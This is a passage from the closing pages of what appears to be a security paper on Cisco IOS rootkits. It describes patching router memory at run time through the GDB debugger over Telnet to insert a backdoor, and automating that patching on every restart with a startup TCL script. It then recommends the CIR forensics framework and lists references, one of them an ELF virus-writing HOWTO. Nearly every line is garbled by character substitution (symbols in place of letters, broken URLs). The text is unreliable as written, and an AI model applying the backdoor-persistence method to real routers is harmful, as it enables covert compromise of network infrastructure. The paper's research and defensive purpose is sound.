registers inspection but it cannot !o#i)y syste! alues 6!e!ory
o) registers alues7*
The syste! e'ecution continues nor!ally #uring #ebugging so
'e'a!ine' !o#e can be e'ecute# oer a Telnet session*
0rocess #ebugging? +n the situations that a console port o) the
#eice is not accessible" process #ebug !o#e can be e'ecute#* +t
%orks by catching unhan#le# e'ceptions on the speci)ie# process"
setting it in a special state %here it %ill not be resche#ule#
an# then running the process o) the #ebugger to #ebug the )aile#
process*
The +OS syste! continues to run #uring process #ebugging so it
is possible to #ebug a process oer a Telnet session but certain
restrictions apply* The sche#uler" an interrupt serice routine
or any process nee#e# )or the #ebugging path 6such as TC0I+07
cannot be #ebugge# oer this session*
This #ebugging !o#e is capable o) !e!ory an# processor registers
!o#i)ication so this is the best option )or an attacker to
re!otely !o#i)y the #eice !e!ory to insert the back#oor*
5ernel #ebugging? +) the attacker gains physical access to a
console port he or she can e'ecute the kernel #ebugger %hich is
the pre)erre# %ay to #ebug a router* +n this !o#e" the entire
#eice e'ecution is stoppe# #uring the e'ception" )reezing all
syste! states*
(sing the Telnet connection" a re!ote X4P instance can be e'ecute# to
per)or! !e!ory patching but certain precautions !ust be taken" such
as not %riting the tra!poline co#e be)ore the rootkit co#e" because"
i) a patche# )unction is inoke# be)ore the rootkit co#e is in place
a !e!ory access iolation %ill be raise# lea#ing to a syste! crash*
-n attacker !ight %ant to auto!ate this run,ti!e patching proce#ure
)or eery syste! restart an# it can be acco!plishe# in a )e%
#i))erent %ays* One possible %ay is to create a TC& script to e'ecute
at startup" engage a Telnet session %ith the local host an# e'ecute
the process #ebugger to patch the #eice it is running on*
+n this case" the script !ust contain the rootkit co#e insi#e %ith
the !e!ory locations to be !o#i)ie# ,, %hich coul# hae been
preiously obtaine# by the sa!e analysis phase inole# in the i!age
binary patching proce#ure*
Page 35 of 37
Conclusions
- reliable an# generic !etho# )or Cisco +OS i!age in)ection can be
i!ple!ente# either ia binary i!age !o#i)ication or ia run,ti!e co#e
patching*
To )ace this kin# o) threat the only possibility aailable to#ay is
to use C+R12>3" a tool create# by /eli' '/9' &in#ner )ro! Recurity
&abs an# presente# early this year %hen he talke# about #eelop!ents
on +OS )orensics12B3*
The C+R analysis )ra!e%ork ai!s at i#enti)ying co!pro!ise# routers"
e'ploitation atte!pts an# back#oors ,, as %ell as process an# !e!ory
ano!alies*
The )ra!e%ork inspects a snapshot o) the lie +OS !e!ory 6core #u!p
or X4P #ebug connection7 an# reconstructs the central #ata
structures" proi#ing an abstraction layer )or in,#epth analysis
!o#ules an# reporting*
+t's i!portant to !ake a special !ention o) C+R because it's the O8&_
serious 6an# possible7 %ay to per)or! )orensics on a Cisco #eice an#
it still !ight be co!plicate# i) the rootkit controls the core,#u!p
generation routines* +n that case" the C+R alternatie !etho#s like
X4P #ebug connection shoul# be use#*
(nless eery syste! a#!inistrator plans on using a#ance# )orensics
!etho#s on eery #eice on their net%orks like the one 6an# only7
!entione# be)ore" they shoul# take serious security !easures an# try
to keep the #eices up#ate# to !ini!ize risks*
Een this %ork !ay not be enough to #etect an a#ance# rootkit
alrea#y #eploye# in the syste!" #epen#ing on the stealth leel o) the
rootkit ,, so" e'ternal !etho#s o) #eice co!pro!ise #etection shoul#
be conceie# because relaying in a possible in)ecte# i!age is as ba#
as running antiirus in a co!puter alrea#y in)ecte#" an# relaying in
an OS that is alrea#y co!pro!ise#*
Page 36 of 37
"eferences
123 - )ree 0ython interpreter )or $in#o%s calle# -ctie0ython can be
obtaine# at?
http?II%%%*actiestate*co!I0ro#uctsIactiepythonI)eatures*ple'
123 0ython )or beginners
http?II%iki*python*orgI!oinIPeginnersXui#e
1>3 +4- 0ro #isasse!bler an# #ebugger
http?II%%%*he',rays*co!Ii#aproI
1B3 +4-0ython is a plug,in )or +4- 0ro to allo% python scripts to be
e'ecute# in the conte't o) +4- an# to access all o) its )unctions* +t
can be #o%nloa#e# )ro! http?II#,#o!e*netIi#apython
1O3 'The E&/ irus %riting <O$TO'
http?II%%%*linu'security*co!IresourceH)ilesI#ocu!entationIirus,
%riting,<O$TOIHht!lIin#e'*ht!l
1E3 4aniel <o#son presentation at R(9CO8 200B
http?II%%%*ru'con*org*auI)ilesI200BI22,#anielHho#son*ppt
1Q3 4o%nloa# XCC 6X8( Co!piler Collection7 at http?IIgcc*gnu*orgI
183 XCC cross co!piler in)o at?
http?IIen*%ikipe#ia*orgI%ikiICrossHco!piler
1D3 0yEl) is a si!ple library )or easy E&/ )ile !anipulation* Re)er
to Core Security Technologies' site )or ne%s about it*
1203 X8( Pinutils can be obtaine# at ?
http?II%%%*gnu*orgIso)t%areIbinutilsIbinutils*ht!l
1223 +n)or!ation about the tool calle# ob=#u!p inclu#e# in binutils
can be obtaine# at http?IIen*%ikipe#ia*orgI%ikiIOb=#u!p
1223 X4P is The X8( 4ebugger 0ro=ect an# in)or!ation about it can be
obtaine# )ro! http?IIsource%are*orgIg#bI
12>3 C+R 6Cisco +n)or!ation Retrieal7
http?IIcir*recurity,labs*co!I
12B3 '4eelop!ents in +OS /orensics'
http://www.recurity- la!.co"/co#te#t/pu/$ecurity%a!&'e(elop"e#t!&i#&)*+&,ore#!ic!.p-f
Page 37 of 37